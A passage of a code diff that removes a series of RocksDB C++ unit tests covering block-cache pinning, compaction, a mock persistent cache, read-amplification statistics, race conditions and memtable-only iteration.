-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-}
-
-TEST_P(PinL0IndexAndFilterBlocksTest,
-       MultiLevelIndexAndFilterBlocksCachedWithPinning) {
-  Options options = CurrentOptions();
-  PinL0IndexAndFilterBlocksTest::CreateTwoLevels(&options, false);
-  // get base cache values
-  uint64_t fm = TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS);
-  uint64_t fh = TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT);
-  uint64_t im = TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS);
-  uint64_t ih = TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT);
-
-  std::string value;
-  // this should be read from L0
-  // so cache values don't change
-  value = Get(1, "a2");
-  ASSERT_EQ(fm, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(fh, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(im, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(ih, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-
-  // this should be read from L1
-  // the file is opened, prefetching results in a cache filter miss
-  // the block is loaded and added to the cache,
-  // then the get results in a cache hit for L1
-  // When we have inifinite max_files, there is still cache miss because we have
-  // reset the block cache
-  value = Get(1, "a");
-  ASSERT_EQ(fm + 1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(im + 1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-}
-
-TEST_P(PinL0IndexAndFilterBlocksTest, DisablePrefetchingNonL0IndexAndFilter) {
-  Options options = CurrentOptions();
-  // This ensures that db does not ref anything in the block cache, so
-  // EraseUnRefEntries could clear them up.
-  bool close_afterwards = true;
-  PinL0IndexAndFilterBlocksTest::CreateTwoLevels(&options, close_afterwards);
-
-  // Get base cache values
-  uint64_t fm = TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS);
-  uint64_t fh = TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT);
-  uint64_t im = TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS);
-  uint64_t ih = TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT);
-
-  // Reopen database. If max_open_files is set as -1, table readers will be
-  // preloaded. This will trigger a BlockBasedTable::Open() and prefetch
-  // L0 index and filter. Level 1's prefetching is disabled in DB::Open()
-  TryReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  if (infinite_max_files_) {
-    // After reopen, cache miss are increased by one because we read (and only
-    // read) filter and index on L0
-    ASSERT_EQ(fm + 1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-    ASSERT_EQ(fh, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-    ASSERT_EQ(im + 1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-    ASSERT_EQ(ih, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-  } else {
-    // If max_open_files is not -1, we do not preload table readers, so there is
-    // no change.
-    ASSERT_EQ(fm, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-    ASSERT_EQ(fh, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-    ASSERT_EQ(im, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-    ASSERT_EQ(ih, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-  }
-  std::string value;
-  // this should be read from L0
-  value = Get(1, "a2");
-  // If max_open_files is -1, we have pinned index and filter in Rep, so there
-  // will not be changes in index and filter misses or hits. If max_open_files
-  // is not -1, Get() will open a TableReader and prefetch index and filter.
-  ASSERT_EQ(fm + 1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(fh, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(im + 1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(ih, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-
-  // this should be read from L1
-  value = Get(1, "a");
-  if (infinite_max_files_) {
-    // In inifinite max files case, there's a cache miss in executing Get()
-    // because index and filter are not prefetched before.
-    ASSERT_EQ(fm + 2, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-    ASSERT_EQ(fh, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-    ASSERT_EQ(im + 2, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-    ASSERT_EQ(ih, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-  } else {
-    // In this case, cache miss will be increased by one in
-    // BlockBasedTable::Open() because this is not in DB::Open() code path so we
-    // will prefetch L1's index and filter. Cache hit will also be increased by
-    // one because Get() will read index and filter from the block cache
-    // prefetched in previous Open() call.
-    ASSERT_EQ(fm + 2, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-    ASSERT_EQ(fh + 1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-    ASSERT_EQ(im + 2, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-    ASSERT_EQ(ih + 1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-  }
-}
-
-INSTANTIATE_TEST_CASE_P(PinL0IndexAndFilterBlocksTest,
-                        PinL0IndexAndFilterBlocksTest, ::testing::Bool());
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest2, MaxCompactionBytesTest) {
-  Options options = CurrentOptions();
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(DBTestBase::kNumKeysByGenerateNewRandomFile));
-  options.compaction_style = kCompactionStyleLevel;
-  options.write_buffer_size = 200 << 10;
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 4;
-  options.num_levels = 4;
-  options.compression = kNoCompression;
-  options.max_bytes_for_level_base = 450 << 10;
-  options.target_file_size_base = 100 << 10;
-  // Infinite for full compaction.
-  options.max_compaction_bytes = options.target_file_size_base * 100;
-
-  Reopen(options);
-
-  Random rnd(301);
-
-  for (int num = 0; num < 8; num++) {
-    GenerateNewRandomFile(&rnd);
-  }
-  CompactRangeOptions cro;
-  cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-  ASSERT_EQ("0,0,8", FilesPerLevel(0));
-
-  // When compact from Ln -> Ln+1, cut a file if the file overlaps with
-  // more than three files in Ln+1.
-  options.max_compaction_bytes = options.target_file_size_base * 3;
-  Reopen(options);
-
-  GenerateNewRandomFile(&rnd);
-  // Add three more small files that overlap with the previous file
-  for (int i = 0; i < 3; i++) {
-    Put("a", "z");
-    ASSERT_OK(Flush());
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  // Output files to L1 are cut to three pieces, according to
-  // options.max_compaction_bytes
-  ASSERT_EQ("0,3,8", FilesPerLevel(0));
-}
-
-static void UniqueIdCallback(void* arg) {
-  int* result = reinterpret_cast<int*>(arg);
-  if (*result == -1) {
-    *result = 0;
-  }
-
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "GetUniqueIdFromFile:FS_IOC_GETVERSION", UniqueIdCallback);
-}
-
-class MockPersistentCache : public PersistentCache {
- public:
-  explicit MockPersistentCache(const bool is_compressed, const size_t max_size)
-      : is_compressed_(is_compressed), max_size_(max_size) {
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-    rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "GetUniqueIdFromFile:FS_IOC_GETVERSION", UniqueIdCallback);
-  }
-
-  virtual ~MockPersistentCache() {}
-
-  PersistentCache::StatsType Stats() override {
-    return PersistentCache::StatsType();
-  }
-
-  Status Insert(const Slice& page_key, const char* data,
-                const size_t size) override {
-    MutexLock _(&lock_);
-
-    if (size_ > max_size_) {
-      size_ -= data_.begin()->second.size();
-      data_.erase(data_.begin());
-    }
-
-    data_.insert(std::make_pair(page_key.ToString(), std::string(data, size)));
-    size_ += size;
-    return Status::OK();
-  }
-
-  Status Lookup(const Slice& page_key, std::unique_ptr<char[]>* data,
-                size_t* size) override {
-    MutexLock _(&lock_);
-    auto it = data_.find(page_key.ToString());
-    if (it == data_.end()) {
-      return Status::NotFound();
-    }
-
-    assert(page_key.ToString() == it->first);
-    data->reset(new char[it->second.size()]);
-    memcpy(data->get(), it->second.c_str(), it->second.size());
-    *size = it->second.size();
-    return Status::OK();
-  }
-
-  bool IsCompressed() override { return is_compressed_; }
-
-  std::string GetPrintableOptions() const override {
-    return "MockPersistentCache";
-  }
-
-  port::Mutex lock_;
-  std::map<std::string, std::string> data_;
-  const bool is_compressed_ = true;
-  size_t size_ = 0;
-  const size_t max_size_ = 10 * 1024;  // 10KiB
-};
-
-#ifndef OS_SOLARIS // GetUniqueIdFromFile is not implemented
-TEST_F(DBTest2, PersistentCache) {
-  int num_iter = 80;
-
-  Options options;
-  options.write_buffer_size = 64 * 1024;  // small write buffer
-  options.statistics = rocksdb::CreateDBStatistics();
-  options = CurrentOptions(options);
-
-  auto bsizes = {/*no block cache*/ 0, /*1M*/ 1 * 1024 * 1024};
-  auto types = {/*compressed*/ 1, /*uncompressed*/ 0};
-  for (auto bsize : bsizes) {
-    for (auto type : types) {
-      BlockBasedTableOptions table_options;
-      table_options.persistent_cache.reset(
-          new MockPersistentCache(type, 10 * 1024));
-      table_options.no_block_cache = true;
-      table_options.block_cache = bsize ? NewLRUCache(bsize) : nullptr;
-      table_options.block_cache_compressed = nullptr;
-      options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-      DestroyAndReopen(options);
-      CreateAndReopenWithCF({"pikachu"}, options);
-      // default column family doesn't have block cache
-      Options no_block_cache_opts;
-      no_block_cache_opts.statistics = options.statistics;
-      no_block_cache_opts = CurrentOptions(no_block_cache_opts);
-      BlockBasedTableOptions table_options_no_bc;
-      table_options_no_bc.no_block_cache = true;
-      no_block_cache_opts.table_factory.reset(
-          NewBlockBasedTableFactory(table_options_no_bc));
-      ReopenWithColumnFamilies(
-          {"default", "pikachu"},
-          std::vector<Options>({no_block_cache_opts, options}));
-
-      Random rnd(301);
-
-      // Write 8MB (80 values, each 100K)
-      ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-      std::vector<std::string> values;
-      std::string str;
-      for (int i = 0; i < num_iter; i++) {
-        if (i % 4 == 0) {  // high compression ratio
-          str = RandomString(&rnd, 1000);
-        }
-        values.push_back(str);
-        ASSERT_OK(Put(1, Key(i), values[i]));
-      }
-
-      // flush all data from memtable so that reads are from block cache
-      ASSERT_OK(Flush(1));
-
-      for (int i = 0; i < num_iter; i++) {
-        ASSERT_EQ(Get(1, Key(i)), values[i]);
-      }
-
-      auto hit = options.statistics->getTickerCount(PERSISTENT_CACHE_HIT);
-      auto miss = options.statistics->getTickerCount(PERSISTENT_CACHE_MISS);
-
-      ASSERT_GT(hit, 0);
-      ASSERT_GT(miss, 0);
-    }
-  }
-}
-#endif // !OS_SOLARIS
-
-namespace {
-void CountSyncPoint() {
-  TEST_SYNC_POINT_CALLBACK("DBTest2::MarkedPoint", nullptr /* arg */);
-}
-}  // namespace
-
-TEST_F(DBTest2, SyncPointMarker) {
-  std::atomic<int> sync_point_called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBTest2::MarkedPoint",
-      [&](void* arg) { sync_point_called.fetch_add(1); });
-
-  // The first dependency enforces Marker can be loaded before MarkedPoint.
-  // The second checks that thread 1's MarkedPoint should be disabled here.
-  // Execution order:
-  // |   Thread 1    |  Thread 2   |
-  // |               |   Marker    |
-  // |  MarkedPoint  |             |
-  // | Thread1First  |             |
-  // |               | MarkedPoint |
-  rocksdb::SyncPoint::GetInstance()->LoadDependencyAndMarkers(
-      {{"DBTest2::SyncPointMarker:Thread1First", "DBTest2::MarkedPoint"}},
-      {{"DBTest2::SyncPointMarker:Marker", "DBTest2::MarkedPoint"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  std::function<void()> func1 = [&]() {
-    CountSyncPoint();
-    TEST_SYNC_POINT("DBTest2::SyncPointMarker:Thread1First");
-  };
-
-  std::function<void()> func2 = [&]() {
-    TEST_SYNC_POINT("DBTest2::SyncPointMarker:Marker");
-    CountSyncPoint();
-  };
-
-  auto thread1 = port::Thread(func1);
-  auto thread2 = port::Thread(func2);
-  thread1.join();
-  thread2.join();
-
-  // Callback is only executed once
-  ASSERT_EQ(sync_point_called.load(), 1);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-#endif
-
-size_t GetEncodedEntrySize(size_t key_size, size_t value_size) {
-  std::string buffer;
-
-  PutVarint32(&buffer, static_cast<uint32_t>(0));
-  PutVarint32(&buffer, static_cast<uint32_t>(key_size));
-  PutVarint32(&buffer, static_cast<uint32_t>(value_size));
-
-  return buffer.size() + key_size + value_size;
-}
-
-TEST_F(DBTest2, ReadAmpBitmap) {
-  Options options = CurrentOptions();
-  BlockBasedTableOptions bbto;
-  uint32_t bytes_per_bit[2] = {1, 16};
-  for (size_t k = 0; k < 2; k++) {
-    // Disable delta encoding to make it easier to calculate read amplification
-    bbto.use_delta_encoding = false;
-    // Huge block cache to make it easier to calculate read amplification
-    bbto.block_cache = NewLRUCache(1024 * 1024 * 1024);
-    bbto.read_amp_bytes_per_bit = bytes_per_bit[k];
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    options.statistics = rocksdb::CreateDBStatistics();
-    DestroyAndReopen(options);
-
-    const size_t kNumEntries = 10000;
-
-    Random rnd(301);
-    for (size_t i = 0; i < kNumEntries; i++) {
-      ASSERT_OK(Put(Key(static_cast<int>(i)), RandomString(&rnd, 100)));
-    }
-    ASSERT_OK(Flush());
-
-    Close();
-    Reopen(options);
-
-    // Read keys/values randomly and verify that reported read amp error
-    // is less than 2%
-    uint64_t total_useful_bytes = 0;
-    std::set<int> read_keys;
-    std::string value;
-    for (size_t i = 0; i < kNumEntries * 5; i++) {
-      int key_idx = rnd.Next() % kNumEntries;
-      std::string key = Key(key_idx);
-      ASSERT_OK(db_->Get(ReadOptions(), key, &value));
-
-      if (read_keys.find(key_idx) == read_keys.end()) {
-        auto internal_key = InternalKey(key, 0, ValueType::kTypeValue);
-        total_useful_bytes +=
-            GetEncodedEntrySize(internal_key.size(), value.size());
-        read_keys.insert(key_idx);
-      }
-
-      double expected_read_amp =
-          static_cast<double>(total_useful_bytes) /
-          options.statistics->getTickerCount(READ_AMP_TOTAL_READ_BYTES);
-
-      double read_amp =
-          static_cast<double>(options.statistics->getTickerCount(
-              READ_AMP_ESTIMATE_USEFUL_BYTES)) /
-          options.statistics->getTickerCount(READ_AMP_TOTAL_READ_BYTES);
-
-      double error_pct = fabs(expected_read_amp - read_amp) * 100;
-      // Error between reported read amp and real read amp should be less than
-      // 2%
-      EXPECT_LE(error_pct, 2);
-    }
-
-    // Make sure we read every thing in the DB (which is smaller than our cache)
-    Iterator* iter = db_->NewIterator(ReadOptions());
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ASSERT_EQ(iter->value().ToString(), Get(iter->key().ToString()));
-    }
-    delete iter;
-
-    // Read amp is on average 100% since we read all what we loaded in memory
-    if (k == 0) {
-      ASSERT_EQ(
-          options.statistics->getTickerCount(READ_AMP_ESTIMATE_USEFUL_BYTES),
-          options.statistics->getTickerCount(READ_AMP_TOTAL_READ_BYTES));
-    } else {
-      ASSERT_NEAR(
-          options.statistics->getTickerCount(READ_AMP_ESTIMATE_USEFUL_BYTES) *
-              1.0f /
-              options.statistics->getTickerCount(READ_AMP_TOTAL_READ_BYTES),
-          1, .01);
-    }
-  }
-}
-
-#ifndef OS_SOLARIS // GetUniqueIdFromFile is not implemented
-TEST_F(DBTest2, ReadAmpBitmapLiveInCacheAfterDBClose) {
-  if (dbname_.find("dev/shm") != std::string::npos) {
-    // /dev/shm dont support getting a unique file id, this mean that
-    // running this test on /dev/shm will fail because lru_cache will load
-    // the blocks again regardless of them being already in the cache
-    return;
-  }
-  uint32_t bytes_per_bit[2] = {1, 16};
-  for (size_t k = 0; k < 2; k++) {
-    std::shared_ptr<Cache> lru_cache = NewLRUCache(1024 * 1024 * 1024);
-    std::shared_ptr<Statistics> stats = rocksdb::CreateDBStatistics();
-
-    Options options = CurrentOptions();
-    BlockBasedTableOptions bbto;
-    // Disable delta encoding to make it easier to calculate read amplification
-    bbto.use_delta_encoding = false;
-    // Huge block cache to make it easier to calculate read amplification
-    bbto.block_cache = lru_cache;
-    bbto.read_amp_bytes_per_bit = bytes_per_bit[k];
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    options.statistics = stats;
-    DestroyAndReopen(options);
-
-    const int kNumEntries = 10000;
-
-    Random rnd(301);
-    for (int i = 0; i < kNumEntries; i++) {
-      ASSERT_OK(Put(Key(i), RandomString(&rnd, 100)));
-    }
-    ASSERT_OK(Flush());
-
-    Close();
-    Reopen(options);
-
-    uint64_t total_useful_bytes = 0;
-    std::set<int> read_keys;
-    std::string value;
-    // Iter1: Read half the DB, Read even keys
-    // Key(0), Key(2), Key(4), Key(6), Key(8), ...
-    for (int i = 0; i < kNumEntries; i += 2) {
-      std::string key = Key(i);
-      ASSERT_OK(db_->Get(ReadOptions(), key, &value));
-
-      if (read_keys.find(i) == read_keys.end()) {
-        auto internal_key = InternalKey(key, 0, ValueType::kTypeValue);
-        total_useful_bytes +=
-            GetEncodedEntrySize(internal_key.size(), value.size());
-        read_keys.insert(i);
-      }
-    }
-
-    size_t total_useful_bytes_iter1 =
-        options.statistics->getTickerCount(READ_AMP_ESTIMATE_USEFUL_BYTES);
-    size_t total_loaded_bytes_iter1 =
-        options.statistics->getTickerCount(READ_AMP_TOTAL_READ_BYTES);
-
-    Close();
-    std::shared_ptr<Statistics> new_statistics = rocksdb::CreateDBStatistics();
-    // Destroy old statistics obj that the blocks in lru_cache are pointing to
-    options.statistics.reset();
-    // Use the statistics object that we just created
-    options.statistics = new_statistics;
-    Reopen(options);
-
-    // Iter2: Read half the DB, Read odd keys
-    // Key(1), Key(3), Key(5), Key(7), Key(9), ...
-    for (int i = 1; i < kNumEntries; i += 2) {
-      std::string key = Key(i);
-      ASSERT_OK(db_->Get(ReadOptions(), key, &value));
-
-      if (read_keys.find(i) == read_keys.end()) {
-        auto internal_key = InternalKey(key, 0, ValueType::kTypeValue);
-        total_useful_bytes +=
-            GetEncodedEntrySize(internal_key.size(), value.size());
-        read_keys.insert(i);
-      }
-    }
-
-    size_t total_useful_bytes_iter2 =
-        options.statistics->getTickerCount(READ_AMP_ESTIMATE_USEFUL_BYTES);
-    size_t total_loaded_bytes_iter2 =
-        options.statistics->getTickerCount(READ_AMP_TOTAL_READ_BYTES);
-
-
-    // Read amp is on average 100% since we read all what we loaded in memory
-    if (k == 0) {
-      ASSERT_EQ(total_useful_bytes_iter1 + total_useful_bytes_iter2,
-                total_loaded_bytes_iter1 + total_loaded_bytes_iter2);
-    } else {
-      ASSERT_NEAR((total_useful_bytes_iter1 + total_useful_bytes_iter2) * 1.0f /
-                      (total_loaded_bytes_iter1 + total_loaded_bytes_iter2),
-                  1, .01);
-    }
-  }
-}
-#endif // !OS_SOLARIS
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest2, AutomaticCompactionOverlapManualCompaction) {
-  Options options = CurrentOptions();
-  options.num_levels = 3;
-  options.IncreaseParallelism(20);
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put(Key(0), "a"));
-  ASSERT_OK(Put(Key(5), "a"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put(Key(10), "a"));
-  ASSERT_OK(Put(Key(15), "a"));
-  ASSERT_OK(Flush());
-
-  CompactRangeOptions cro;
-  cro.change_level = true;
-  cro.target_level = 2;
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-
-  auto get_stat = [](std::string level_str, LevelStatType type,
-                     std::map<std::string, double> props) {
-    auto prop_str =
-        level_str + "." +
-        InternalStats::compaction_level_stats.at(type).property_name.c_str();
-    auto prop_item = props.find(prop_str);
-    return prop_item == props.end() ? 0 : prop_item->second;
-  };
-
-  // Trivial move 2 files to L2
-  ASSERT_EQ("0,0,2", FilesPerLevel());
-  // Also test that the stats GetMapProperty API reporting the same result
-  {
-    std::map<std::string, double> prop;
-    ASSERT_TRUE(dbfull()->GetMapProperty("rocksdb.cfstats", &prop));
-    ASSERT_EQ(0, get_stat("L0", LevelStatType::NUM_FILES, prop));
-    ASSERT_EQ(0, get_stat("L1", LevelStatType::NUM_FILES, prop));
-    ASSERT_EQ(2, get_stat("L2", LevelStatType::NUM_FILES, prop));
-    ASSERT_EQ(2, get_stat("Sum", LevelStatType::NUM_FILES, prop));
-  }
-
-  // While the compaction is running, we will create 2 new files that
-  // can fit in L2, these 2 files will be moved to L2 and overlap with
-  // the running compaction and break the LSM consistency.
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "CompactionJob::Run():Start", [&](void* arg) {
-        ASSERT_OK(
-            dbfull()->SetOptions({{"level0_file_num_compaction_trigger", "2"},
-                                  {"max_bytes_for_level_base", "1"}}));
-        ASSERT_OK(Put(Key(6), "a"));
-        ASSERT_OK(Put(Key(7), "a"));
-        ASSERT_OK(Flush());
-
-        ASSERT_OK(Put(Key(8), "a"));
-        ASSERT_OK(Put(Key(9), "a"));
-        ASSERT_OK(Flush());
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Run a manual compaction that will compact the 2 files in L2
-  // into 1 file in L2
-  cro.exclusive_manual_compaction = false;
-  cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  // Test that the stats GetMapProperty API reporting 1 file in L2
-  {
-    std::map<std::string, double> prop;
-    ASSERT_TRUE(dbfull()->GetMapProperty("rocksdb.cfstats", &prop));
-    ASSERT_EQ(1, get_stat("L2", LevelStatType::NUM_FILES, prop));
-  }
-}
-
-TEST_F(DBTest2, ManualCompactionOverlapManualCompaction) {
-  Options options = CurrentOptions();
-  options.num_levels = 2;
-  options.IncreaseParallelism(20);
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put(Key(0), "a"));
-  ASSERT_OK(Put(Key(5), "a"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put(Key(10), "a"));
-  ASSERT_OK(Put(Key(15), "a"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  // Trivial move 2 files to L1
-  ASSERT_EQ("0,2", FilesPerLevel());
-
-  std::function<void()> bg_manual_compact = [&]() {
-    std::string k1 = Key(6);
-    std::string k2 = Key(9);
-    Slice k1s(k1);
-    Slice k2s(k2);
-    CompactRangeOptions cro;
-    cro.exclusive_manual_compaction = false;
-    ASSERT_OK(db_->CompactRange(cro, &k1s, &k2s));
-  };
-  rocksdb::port::Thread bg_thread;
-
-  // While the compaction is running, we will create 2 new files that
-  // can fit in L1, these 2 files will be moved to L1 and overlap with
-  // the running compaction and break the LSM consistency.
-  std::atomic<bool> flag(false);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "CompactionJob::Run():Start", [&](void* arg) {
-        if (flag.exchange(true)) {
-          // We want to make sure to call this callback only once
-          return;
-        }
-        ASSERT_OK(Put(Key(6), "a"));
-        ASSERT_OK(Put(Key(7), "a"));
-        ASSERT_OK(Flush());
-
-        ASSERT_OK(Put(Key(8), "a"));
-        ASSERT_OK(Put(Key(9), "a"));
-        ASSERT_OK(Flush());
-
-        // Start a non-exclusive manual compaction in a bg thread
-        bg_thread = port::Thread(bg_manual_compact);
-        // This manual compaction conflict with the other manual compaction
-        // so it should wait until the first compaction finish
-        env_->SleepForMicroseconds(1000000);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Run a manual compaction that will compact the 2 files in L1
-  // into 1 file in L1
-  CompactRangeOptions cro;
-  cro.exclusive_manual_compaction = false;
-  cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-  bg_thread.join();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBTest2, OptimizeForPointLookup) {
-  Options options = CurrentOptions();
-  Close();
-  options.OptimizeForPointLookup(2);
-  ASSERT_OK(DB::Open(options, dbname_, &db_));
-
-  ASSERT_OK(Put("foo", "v1"));
-  ASSERT_EQ("v1", Get("foo"));
-  Flush();
-  ASSERT_EQ("v1", Get("foo"));
-}
-
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest2, GetRaceFlush1) {
-  ASSERT_OK(Put("foo", "v1"));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::GetImpl:1", "DBTest2::GetRaceFlush:1"},
-       {"DBTest2::GetRaceFlush:2", "DBImpl::GetImpl:2"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread t1([&] {
-    TEST_SYNC_POINT("DBTest2::GetRaceFlush:1");
-    ASSERT_OK(Put("foo", "v2"));
-    Flush();
-    TEST_SYNC_POINT("DBTest2::GetRaceFlush:2");
-  });
-
-  // Get() is issued after the first Put(), so it should see either
-  // "v1" or "v2".
-  ASSERT_NE("NOT_FOUND", Get("foo"));
-  t1.join();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBTest2, GetRaceFlush2) {
-  ASSERT_OK(Put("foo", "v1"));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::GetImpl:3", "DBTest2::GetRaceFlush:1"},
-       {"DBTest2::GetRaceFlush:2", "DBImpl::GetImpl:4"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  port::Thread t1([&] {
-    TEST_SYNC_POINT("DBTest2::GetRaceFlush:1");
-    ASSERT_OK(Put("foo", "v2"));
-    Flush();
-    TEST_SYNC_POINT("DBTest2::GetRaceFlush:2");
-  });
-
-  // Get() is issued after the first Put(), so it should see either
-  // "v1" or "v2".
-  ASSERT_NE("NOT_FOUND", Get("foo"));
-  t1.join();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBTest2, DirectIO) {
-  if (!IsDirectIOSupported()) {
-    return;
-  }
-  Options options = CurrentOptions();
-  options.use_direct_reads = options.use_direct_io_for_flush_and_compaction =
-      true;
-  options.allow_mmap_reads = options.allow_mmap_writes = false;
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put(Key(0), "a"));
-  ASSERT_OK(Put(Key(5), "a"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put(Key(10), "a"));
-  ASSERT_OK(Put(Key(15), "a"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  Reopen(options);
-}
-
-TEST_F(DBTest2, MemtableOnlyIterator) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "foo", "first"));
-  ASSERT_OK(Put(1, "bar", "second"));
-
-  ReadOptions ropt;
-  ropt.read_tier = kMemtableTier;
-  std::string value;
-  Iterator* it = nullptr;
-
-  // Before flushing
-  // point lookups
-  ASSERT_OK(db_->Get(ropt, handles_[1], "foo", &value));
-  ASSERT_EQ("first", value);
-  ASSERT_OK(db_->Get(ropt, handles_[1], "bar", &value));
-  ASSERT_EQ("second", value);
-
-  // Memtable-only iterator (read_tier=kMemtableTier); data not flushed yet.
-  it = db_->NewIterator(ropt, handles_[1]);
-  int count = 0;
-  for (it->SeekToFirst(); it->Valid(); it->Next()) {
-    ASSERT_TRUE(it->Valid());
-    count++;
-  }
-  ASSERT_TRUE(!it->Valid());
-  ASSERT_EQ(2, count);
-  delete it;
-
-  Flush(1);
-
-  // After flushing
-  // point lookups
-  ASSERT_OK(db_->Get(ropt, handles_[1], "foo", &value));
-  ASSERT_EQ("first", value);
-  ASSERT_OK(db_->Get(ropt, handles_[1], "bar", &value));
-  ASSERT_EQ("second", value);
-  // nothing should be returned using memtable-only iterator after flushing.
-  it = db_->NewIterator(ropt, handles_[1]);
-  count = 0;
-  for (it->SeekToFirst(); it->Valid(); it->Next()) {
-    ASSERT_TRUE(it->Valid());
-    count++;
-  }
-  ASSERT_TRUE(!it->Valid());
-  ASSERT_EQ(0, count);
-  delete it;
-
-  // Add a key to memtable
-  ASSERT_OK(Put(1, "foobar", "third"));
-  it = db_->NewIterator(ropt, handles_[1]);
-  count = 0;
-  for (it->SeekToFirst(); it->Valid(); it->Next()) {
-    ASSERT_TRUE(it->Valid());
-    ASSERT_EQ("foobar", it->key().ToString());
-    ASSERT_EQ("third", it->value().ToString());
-    count++;
-  }
-  ASSERT_TRUE(!it->Valid());
-  ASSERT_EQ(1, count);
-  delete it;
-}
-
-TEST_F(DBTest2, LowPriWrite) {
-  Options options = CurrentOptions();
-  // Compaction pressure should trigger since 6 files
-  options.level0_file_num_compaction_trigger = 4;
-  options.level0_slowdown_writes_trigger = 12;
-  options.level0_stop_writes_trigger = 30;
-  options.delayed_write_rate = 8 * 1024 * 1024;
-  Reopen(options);
-
